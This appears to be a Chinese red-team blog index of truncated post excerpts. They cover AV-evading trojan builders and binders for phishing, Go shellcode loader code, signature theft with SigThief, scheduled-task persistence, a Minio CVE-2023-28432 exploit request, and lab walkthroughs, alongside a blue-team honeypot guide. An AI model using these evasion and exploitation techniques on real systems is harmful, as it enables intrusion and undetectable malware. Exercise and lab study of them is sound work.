渗透测试-Burpsuite指纹特征绕过
github地址:
https://github.com/sleeyax/burp-awesome-tls
需要高版本17+的burp运行插件,可bypass网站流量设备的检测,正常抓包
未使用插件前,burp指纹特征被识别,抓包被拦截
使用插件后正常抓包
溯源反制-自搭建蜜罐到反制攻击队
溯源反制-自搭建蜜罐到反制攻击队前言本篇文章结合最近的ps比赛和之前的案例总结了一些作为蓝队的经验,希望能对蓝队溯源得分有所帮助,如果还有其他奇招妙法欢迎师傅们多多交流
溯源反制一直是老生常谈的话题,是红蓝双方的对抗博弈,即便是专业的红队也会有犯错的时刻,大致总结为下面这些原因:
比赛提供的机器太过于卡顿,使用虚拟机操作影响效率,心情浮躁直接真机操作
红队操作习惯不好,未使用干净的虚拟机操作,机器上存有可溯源身份的文件或信息
”淹死的大多是会游泳的人“,因为有经验所以轻敌,抱有自己不会犯错的心理
对蜜罐判别不准确,未使用无痕模式或者识别蜜罐插件,甚至把蜜罐当作成果分享给队友
反制的大致流程
蜜罐部署部署一个高仿真的虚拟环境,这里有一些事项需要注意的
部署的蜜罐需提前向裁判报备,避免后续扯皮,且蜜罐需单独隔离,防止横向扩散
蜜罐不能太假,如多端口开启不同的web服务,系统要给攻击人员一种是靠自己努力获取成果的假象
如果直接使用xx厂商的云蜜罐,特征十分明显,还很容易在测绘平台上打上蜜罐标签,并且常规反制功能很鸡肋,触发条件很苛刻
这次直接使用之前用来漏洞调试的致远OA环境,考虑 ...
工具开发-免杀木马捆绑器
免杀木马捆绑器前言在攻防演练中,钓鱼是十分重要的一环,能够快速撕破目标的伤口,为了让钓鱼木马更具有迷惑性,需要释放正常的文件进行隐藏,因此诞生此捆绑器
版本更新
1.1版本 bypass常规杀软 (360、def、火绒等)
1.2版本 新增文件释放后自动隐藏
环境前置环境:go版本1.20以上、安装garble
1、 https://git-scm.com/download/win 下载安装git
2、安装garble
12set GOPROXY=https://goproxy.cn,directgo install mvdan.cc/garble@latest
环境未搭建好,可能会出现以下报错
12cannot get modified linker: exec: "git": executable file not found in %PATH%cannot get modified linker: exec: "garble": executable file not found in %PATH%
捆绑程序第一个参数为木马程序, ...
工具开发-红队免杀木马自动生成器
工具开发-红队免杀木马自动生成器开发目的在攻防对抗中,免杀木马是使用频率最高的东西,但是制作起来需要耗费大量时间精力,重复性工作会让人产生疲惫和厌烦
于是我决定开发一款全自动的工具,只需要双击鼠标便可以生成免杀马,因此诞生了这个工具!
环境准备由于本人比较熟悉go,于是决定用go进行开发,但是说实话在开发过程中感受到了很多局限性,比如依赖库问题,后续开发还是选用其他语言较好
环境准备:安装go和git,go版本需要1.20及以上
https://golang.google.cn/dl/go1.21.0.windows-amd64.msi 下载安装go
https://git-scm.com/download/win 下载安装git
下载相关garble等相关依赖,命令如下
12345set GOPROXY=https://goproxy.cn,directgo install mvdan.cc/garble@latestgo mod init 1go get github.com/darkwyrm/b85go get github.com/gonutz/ide
环境未搭建好, ...
靶场学习-突破有防护的靶场
突破有防护的靶场首先使用常规的目录扫描,无法正常扫描出东西
使用代理池低速扫描成功发现robots.txt
访问/SiteServer/跳转至登陆页面,谷歌一波发现历史漏洞,直接禁用js可重置密码
免杀webshell使用哥斯拉免杀马发现不成功,想到哥斯拉在部分环境中无法正常连接,改用其他的webshell连接工具
生成蚁剑免杀马
成功连接webshell
免杀上线CS探测发现出网
查看主机的杀软情况
easy,使用自写的shellcode加载器生成免杀cs木马
https://github.com/Pizz33/GobypassAV-shellcode
上传上去
本来想直接运行的,发现还是被拦截
估计是目录没权限,换到public下,成功上线
由于目标杀软为def,使用bof来规避杀软
本来想着直接探测内网,但发现权限不足
PrintSpoofer直接提权
提完权发现还是无法写入。。。可能是安全狗的原因吧,并且普通的探测无法探测到主机
怀疑对ping进行拦截,使用-np进行绕过,成功探测到主机10.10.1.130
使用c ...
红队技术-攻防实战小技巧
外网打点资产测绘三剑客https://hunter.qianxin.com/https://fofa.info/https://quake.360.cn/
挖掘高价值资产https://github.com/EdgeSecurityTeam/EHole
ehole重构了一版,需要下载source code进行自编译,realease为旧版本
https://github.com/lijiejie/BBScan
挖掘敏感信息和后台地址
1234567891011121314151617181920212223242526272829303132333435363738394041Targets: --host [HOST [HOST ...]] Scan several hosts from command line -f TargetFile Load new line delimited targets from TargetFile -d TargetDirectory Load all *.txt fil ...
红队技术-隐藏上传的程序木马
红队技术-隐藏上传的程序木马1、exe伪装正常程序https://github.com/secretsquirrel/SigThief
python sigthief.py -i 360Safe.exe -t notepad.exe -o tes.exe
123-i 为签名文件-t 为需要伪造的文件-o 为输出文件
https://www.trustasia.com/solution/sign-tools
图标提取
https://github.com/JarlPenguin/BeCyIconGrabberPortable
图标替换
Resource hacker
2、调用计划任务API维权使用计划任务对木马程序做好维权
123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293 ...
免杀技术-go shellcode加载bypassAV
go shellcode加载 bypass AV
在攻防实战中免杀技术尤为重要,站在巨人的肩膀上学习go shellcode免杀加载的方法
相关代码打包至github https://github.com/Pizz33/GobypassAV-shellcode
免杀效果预览:
编写一个加载器需要围绕3个基本的功能实现:
申请内存空间:VirtualAlloc、VirtualAlloc2、VirtualAllocEx
导入内存:RtlCopyMemory、RtlCopyBytes、RtlMoveMemory
调用执行:创建线程的方式执行、用syscall调用执行、内嵌C代码执行
内存空间申请VirtualAlloc
1234567VirtualAlloc:在调用进程的虚拟地址空间中保留、提交或更改页面区域的状态(分配的内存初始化为零)SWAPMem, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), 0x1000|0x2000, 0x40)//0:开始内存地址//uintptr(len(shellcode)):申请内存长 ...
漏洞复现-Minio信息泄露漏洞(CVE-2023-28432)
Minio信息泄露漏洞(CVE-2023-28432)12345678910POST /minio/bootstrap/v1/verify HTTP/1.1Host:User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1Content-Type: application/x-www-form-urlencodedContent-Length: 0
批量检测脚本
123456 ...
靶场学习-自建三层内网靶场
自建内网靶场
https://github.com/yangzongzhuan/RuoYi/releases
ruoyi-admin\target\classes\application-druid.yml
修改数据库账号密码
idea编译生成适配环境的jar包
数据库配置推荐:mysql5+、jdk1.8
新建数据库ry,导入sql目录的两个sql文件
成功运行
检索cipherKey替换key
除此以外,为了搭建存在的漏洞环境,还需要在pom.xml修改shiro的版本为有漏洞的版本
生成heapdump
1C:\Program Files\Java\jdk1.8.0_301\bin>jmap -dump:file=C:\Users\Public\heapdump <pid>
这样heapdump中便带有了shiro的key
入口机器80端口为若依系统,8081端口为tomcat管理界面
若依使用的是4.6的版本,存在前台shiro漏洞利用,但是key被修改了
对8081端口tomcat页面进行目录扫描,发现存在heapdump
使用工具进行 ...
